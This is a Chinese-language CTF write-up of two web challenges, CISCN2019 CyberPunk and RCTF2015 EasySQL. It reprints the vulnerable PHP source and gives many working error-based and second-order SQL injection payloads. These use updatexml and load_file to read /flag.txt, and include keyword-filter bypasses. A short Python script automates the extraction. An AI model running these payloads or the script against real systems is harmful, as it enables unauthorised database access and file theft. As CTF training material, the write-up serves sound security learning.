[CISCN2019 华北赛区 Day1 Web5]CyberPunk

image-20210126211211834

image-20210126211613607

php伪协议

发现有个?file=

和之前做DMZCTF差不多!

看见file不是文件包含!就是文件读取!

发现不能直接读取/etc/passwd

试一试伪协议!

http://9447554f-712e-49d9-9b22-f4952914729f.node3.buuoj.cn/?file=pHp://FilTer/convert.base64-encode/resource=index.php

二次注入|报错注入

confirm.php


confirm.php
<?php

require_once "config.php";
//var_dump($_POST);

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = $_POST["address"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if($fetch->num_rows>0) {
        $msg = $user_name."已提交订单";
    }else{
        $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
        $re = $db->prepare($sql);
        $re->bind_param("sss", $user_name, $address, $phone);
        $re = $re->execute();
        if(!$re) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单提交成功";
    }
} else {
    $msg = "信息不全";
}
?>

change.php


change.php
<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

看完源码后可以知道 confirm.phpchange.php 里$address都没有进行过滤!

那这个时候只要我们在index.php提交数据!address是我们构造的恶意数据!

再到change.php里随便执行一下!恶意代码就可以执行!

因为:change.php里有报错输出!(考报错注入!)

if(!$re) {
    echo 'error';
    print_r($db->error);
    exit;
}

payload:

-1' and updatexml(1,concat(0x7e,database()),1)%23

-1' and updatexml(1,concat(0x7e,(select(load_file('/flag.txt'))),0x7e),1)#
-1' and updatexml(1,concat(0x7e,(select(load_file('/flag.txt'))),0x7e),1)#

flag{d0dd9648-5996-4185-bec7-bb
-1' and updatexml(1,concat(0x7e,(select(substr((load_file('/flag.txt')),15,30))),0x7e),1)#

-1' and updatexml(1,concat(0x7e,(select(substr((load_file('/flag.txt')),15,30))),0x7e),1)#

flag{d0dd9648-5996-4185-bec7-bbb018abc606}
5996-4185-bec7-bbb018abc606}

-1'/**/and/**/updatexml(1,concat(0x7e,(select(mid((load_file('/flag.txt')),15,30))),0x7e),1)#

mid和sunstr可以替换
left左边可以读取的长度!
right右边可以读取的长度!

-1' and updatexml(1,concat(0x7e,(select(right((load_file('/flag.txt')),15))),0x7e),1)#
还有大佬的
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)#

总结:

连着遇到两回二次注入!

挺有意思的!主要考了代码的审计!像这种网址的源码还是要多看看!🙄🙄😶😶

[RCTF2015]EasySQL

image-20210127172319621

题目已经很明显了!而且还给了俩登录框!那一定是sql注入了!😶😶😶再说废话!

注册还注册不了!

不是邮箱还不能正常注册了!!!

正常注册不行!

直接3a走起!

sql注入报错注入

注册的时候:

输入:a\ a\ a\

再修改密码的时候发现!

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' "a\" and pwd='47bce5c74f589f4867dbd57e9ca9f808'   ' at line 1


发现报错:
"a\" and pwd='47bce5c74f589f4867dbd57e9ca9f808'

可以构造语句:
select * from users where username="" and pwd='';


payload:

测试

select(id)from(c)where(id=1);

-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1);

(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))

(select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database()))

-1'/**/and/**/updatexml(1,concat(0x7e,(select((load_file('/flag.txt')))),0x7e),1)#


payload

爆表
upload'/**/&&/**/updatexml(1,concat(0x7e,(select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),0x7e),1)#


爆字段
upload'/**/&&/**/updatexml(1,concat(0x7e,(select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')&&(column_name)REGEXP/**/'^u'),0x7e),1)#



upload"/**/&&/**/updatexml(1,concat(0x3a,(select/**/group_concat(0x23,real_flag_1s_here,0x23)/**/from/**/users/**/where(real_flag_1s_here)REGEXP/**/'^fla'),0x3a),1)#


爆数据
upload"&&(updatexml(1,concat(0x7e,(select(group_concat(0x40,real_flag_1s_here,0x40))from(users)where((real_flag_1s_here)REGEXP('^fla'))),0x7e),1))#

flag{c7add9ad-b9ca-4f77-925d-5

upload"&&(updatexml(1,concat(0x7e,(select(group_concat(0x40,real_flag_1s_here,0x40))from(users)where((real_flag_1s_here)REGEXP('^7add9ad'))),0x7e),1))#

upload"&&(updatexml(1,concat(0x7e,reverse((select(group_concat(0x40,real_flag_1s_here,0x40))from(users)where((real_flag_1s_here)REGEXP/**/'^fla')))
,0x7e),1))#

upload"&&(updatexml(1,concat(0x7e,reverse((select(group_concat(0x40,real_flag_1s_here,0x40))from(users)where((real_flag_1s_here)REGEXP('^fla'))))
,0x7e),1))#

reverse

Sql sever里面有个自带的reverse函数,这个函数的主要功能是把一个字符产反转。比如对于:

https://www.cnblogs.com/fgynew/archive/2010/08/30/1812976.html

REGEXP正则

MySQL 正则表达式

https://www.runoob.com/mysql/mysql-regexp.html

查找name字段中以’ok’为结尾的所有数据:

mysql> SELECT name FROM person_tbl WHERE name REGEXP 'ok$';

大佬的exp:

exp

import requests

url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php'
url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php'
url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php'

pre = 'peri0d"'
suf = "'))),1))#"

s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)

r = requests.session()

def register(name):
	data = {
		'username' : name,
		'password' : '123',
		'email' : '123',
	}
	r.post(url=url_reg, data=data)

def login(name):
	data = {
		'username' : name,
		'password' : '123',
	}
	r.post(url=url_log, data=data)
	
def changepwd():
	data = {
		'oldpass' : '',
		'newpass' : '',
	}
	kk = r.post(url=url_change, data=data)
	if 'target' not in kk.text:
		print(kk.text)

for i in s:
	paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
	register(paylaod)
	login(paylaod)
	changepwd()